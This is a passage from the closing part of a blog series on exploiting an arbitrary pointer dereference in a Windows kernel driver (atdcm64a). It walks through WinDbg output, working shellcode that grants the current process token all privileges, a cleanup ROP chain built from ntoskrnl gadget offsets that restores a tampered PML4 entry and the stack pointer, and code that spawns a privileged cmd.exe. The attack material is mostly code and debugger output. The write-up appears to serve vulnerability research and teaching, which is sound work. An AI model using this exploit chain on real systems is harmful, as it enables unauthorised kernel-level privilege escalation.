instruction. This is the couterpart ofsyscall
and allows to transit from kernel-mode to user-mode. - Reset the stack pointer to the right location in the stack so that the execution flow gets restored from where it was hijacked.
I preferred to go with the second option as in my opinion it is cleaner and does not leave the memory in an inconsistent state.
The first option instead may, for example, cause memory leaks or leave some mutexes locked. This is because functions in the call stack won’t finish normally, which means resources acquired by the functions part of the call stack (locks, allocations in the pool…) may not be released.
We will also have to restore the PML4 entry to its original value, as I got some issues when our process tries to exit.
Retrieving the original value of the stack pointer
An easy way to retrieve the original value the stack pointer, before tampering it with the pivot gadget, is doing the following consideration:
The stack frames in the stack will have always the same size. If it is true then the offset between the initial stack pointer and the original stack pointer before the hijacking will always be the same.
Let’s verify this in WinDbg. Let’s put a breakpoint at atdcm64a+0x223f
, that is where our vulnerable driver calls IofCallDriver():
1: kd> ba e 1 fffff800`2d9f223f 1: kd> g Breakpoint 1 hit atdcm64a+0x223f: fffff800`2d9f223f ff15fb2d0000 call qword ptr [atdcm64a+0x5040 (fffff800`2d9f5040)] 0: kd> t nt!IofCallDriver: fffff800`25cebea0 4883ec38 sub rsp,38h 0: kd>
Let’s step until we reach jmp rax
, inside nt!guard_dispatch_icall
, the instruction that allows us to hijack the execution flow. Now, let’s inspect the call stack:
1: kd> p nt!guard_dispatch_icall+0x71: fffff800`25e21b01 ffe0 jmp rax 1: kd> k # Child-SP RetAddr Call Site 00 ffffde08`f566f458 fffff800`25cebef5 nt!guard_dispatch_icall+0x71 01 ffffde08`f566f460 fffff800`2d9f2245 nt!IofCallDriver+0x55 02 ffffde08`f566f4a0 fffff800`2d9f16c3 atdcm64a+0x2245 03 ffffde08`f566f520 fffff800`25cebef5 atdcm64a+0x16c3 04 ffffde08`f566f720 fffff800`26140060 nt!IofCallDriver+0x55 05 ffffde08`f566f760 fffff800`26141a90 nt!IopSynchronousServiceTail+0x1d0 06 ffffde08`f566f810 fffff800`26141376 nt!IopXxxControlFile+0x700 07 ffffde08`f566fa00 fffff800`25e2bbe5 nt!NtDeviceIoControlFile+0x56 08 ffffde08`f566fa70 00007ff8`01b6f454 nt!KiSystemServiceCopyEnd+0x25 09 0000007c`fd2ffbb8 00007fff`ff27664b 0x00007ff8`01b6f454 0a 0000007c`fd2ffbc0 0000007c`fd2ffc30 0x00007fff`ff27664b 0b 0000007c`fd2ffbc8 0000007c`fd2ffc38 0x0000007c`fd2ffc30 0c 0000007c`fd2ffbd0 0000007c`fd2ffc40 0x0000007c`fd2ffc38 0d 0000007c`fd2ffbd8 00000000`00000000 0x0000007c`fd2ffc40
From the call stack we can see that after nt!guard_dispatch_icall
the execution should return to 0xfffff80025cebef5 (first row in the call stack).
If we inspect the data stored in the stack, starting from RSP, we can see the return address is at address 0xffffde08f566f458 in the stack:
1: kd> dq @rsp ffffde08`f566f458 fffff800`25cebef5 00000000`00000000 ffffde08`f566f468 fffff800`25cebea0 00000000`00000010 ffffde08`f566f478 00000000`00040304 ffffde08`f566f498 ffffde08`f566f488 00000000`00000018 ffffde08`f566f4a0 ffffde08`f566f498 fffff800`2d9f2245 0000001a`ff000000 ffffde08`f566f4a8 00000000`00000000 ffffe18f`323e500d ffffde08`f566f4b8 fffff800`25dd763f 00000000`00000000 ffffde08`f566f4c8 ffffde08`f566f4f0 ffffde08`f566f4e0
Let’s also retrieve the _ETHREAD and _KTHREAD structs of our current thread:
1: kd> !thread THREAD ffffe18f35335080 Cid 1304.08d4 Teb: 0000007cfd07a000 Win32Thread: 0000000000000000 RUNNING on processor 1 IRP List: ffffe18f36d48000: (0006,1360) Flags: 00060000 Mdl: 00000000 ffffe18f34c31cd0: (0006,0118) Flags: 00060070 Mdl: 00000000 [...] 1: kd> dt nt!_ETHREAD ffffe18f35335080 +0x000 Tcb : _KTHREAD +0x480 CreateTime : _LARGE_INTEGER 0x01dad54a`f0da9edd [...] 1: kd> dx -id 0,0,ffffe18f36a840c0 -r1 (*((ntkrnlmp!_KTHREAD *)0xffffe18f35335080)) (*((ntkrnlmp!_KTHREAD *)0xffffe18f35335080)) [Type: _KTHREAD] [+0x000] Header [Type: _DISPATCHER_HEADER] [+0x018] SListFaultAddress : 0x0 [Type: void *] [+0x020] QuantumTarget : 0x79a5af2 [Type: unsigned __int64] [+0x028] InitialStack : 0xffffde08f566fc70 [Type: void *] [+0x030] StackLimit : 0xffffde08f566a000 [Type: void *] [+0x038] StackBase : 0xffffde08f5670000 [Type: void *] [+0x040] ThreadLock : 0x0 [Type: unsigned __int64] [...]
Notice the value of InitialStack.
If we substract the current value of RSP from InitialStack we get 0x818 as offset value.
1: kd> ? 0xffffde08f566fc70-ffffde08`f566f458 Evaluate expression: 2072 = 00000000`00000818
If we repeat the same procedure after restarting the system we are going to notice the offset between RSP and InitialStack won’t change.
Therefore, in order to retrieve the original value of RSP, before tampering it with our pivot gadget, we can:
- Retrieve the _KTHREAD structure of the current thread from the
gs
register. - Retrieve the value of InitialStack from _KTHREAD.
- Substract 0x818 from InitialStack. The result of the substraction is the original value of rsp before tampering it.
Crafting the cleanup ROP chain
Now that we know how to retrieve the original value of RSP, we need to modify our shellcode and craft a cleanup ROP chain that will perform the following operations:
- Restore the original value of the PML4 entry.
- Restore the original value of RSP so that execution flow can proceed as it was supposed to before we hijacked it.
Here’s the final shellcode:
// storing in RCX original PML4E value mov rdx,rax mov rcx,QWORD PTR [rax] bts rcx,0x2 bts rcx,0x3f // increment privileges payload xor rax,rax mov rax,QWORD PTR gs:[rax+0x188] mov rax,QWORD PTR [rax+0xb8] mov r8,QWORD PTR [rax+0x4b8] and r8,0xfffffffffffffff0 movabs r9,0x1ff2ffffbc mov QWORD PTR [r8+0x40],r9 mov QWORD PTR [r8+0x48],r9 // storing in cleanup ropchain original rsp value xor rax,rax mov rax,QWORD PTR gs:[rax+0x188] mov rax,QWORD PTR [rax+0x28] sub rax,0x818 mov QWORD PTR [rsp+0x20],rax mov rax,rcx ret
Before the increment privileges payload we perform the following operations:
- Move the PML4E’s address in
rdx
. - Recompute the original PML4E value and store it in
rcx
.
After the increment privileges payload we perform the following operations:
- Use
rax
in order to retrieve the InitialStack field from the current’s thread _KTHREAD structure. - Subtract offset 0x818 from
rax
in order to obtain the original rsp value. - Store the original rsp value in our cleanup rop chain with the
QWORD PTR [rsp+0x20],rax
instruction. - Move in
rax
the original value of the PML4E.
Here’s our cleanup ROP chain that is executed after the shellcode:
//<shellcode> ropStack[index] = (ULONGLONG)sc; index++; //<cleanup> ropStack[index] = g_ntbase + 0x35dbc9; index++; // mov qword ptr [rdx], rax; ret; ropStack[index] = g_ntbase + 0x3d4cba; index++; // xor rax, rax; ret; ropStack[index] = g_ntbase + 0x370050; index++; // wbinvd; ret; ropStack[index] = g_ntbase + 0x20505a; index++; // pop rsp; ret; ropStack[index] = 0x4141414141414141; index++; // filled with rsp value //<cleanup>
In this final ROP chain we restore the PML4 entry value. Remember in the shellcode we end up saving the address of PML4E in rdx
and the original value of PML4E in rax
, and finally we pop in RSP the original value of the stack pointer before hijacking execution with the pivot gadget.
The value 0x4141414141414141
in the ROP chain is just a dummy value that is actually replaced with real value with theQWORD PTR [rsp+0x20],rax
instruction, executed in our shellcode.
Getting a high-privileged shell
So, we are just left with spawning a cmd.exe at the end of our exploit, and if the ROP chain completes successfully we should get a shell with all privileges enabled. We can use the system() function at the end of our main() function in order to easily spawn a shell.
int main() { [...] arbitraryCallDriver(outputBuffer, SIZE_BUF); printf("[+] arbitraryCallDriver returned successfully.\n"); printf("[*] spawning system shell...\n"); system("cmd.exe"); return 0; }
The full code of the exploit is available here on GitHub (master branch). At this point after compiling our exploit we should obtain a shell with all privileges enabled!
Conclusion
In this series of articles, I explained the process of finding vulnerabilities in kernel drivers using manual static analysis techniques and developing an exploit that takes advantage of an arbitrary pointer dereference.
Credits
Credits go to:
- @ommadawn46, for his awesome article about how KVA works and how to bypass it.
- Enrique Nissim and Nicolas Economou, for their research paper.
- Alexandru Uifalvi and Morten Schenk for the exploit code.
In addition I would like to thank:
- Cedric Halbronn for his amazing courses on OST2.
- Connor Mcgarr and Paolo Stagno for their awesome blog posts on the topic.
- Igor Skochinsky for the Igor’s tips on Hex-Rays (all I’ve learned about IDA Pro was thanks to his tips).
Contacts
If you have any questions, feel free to reach me at the following contacts: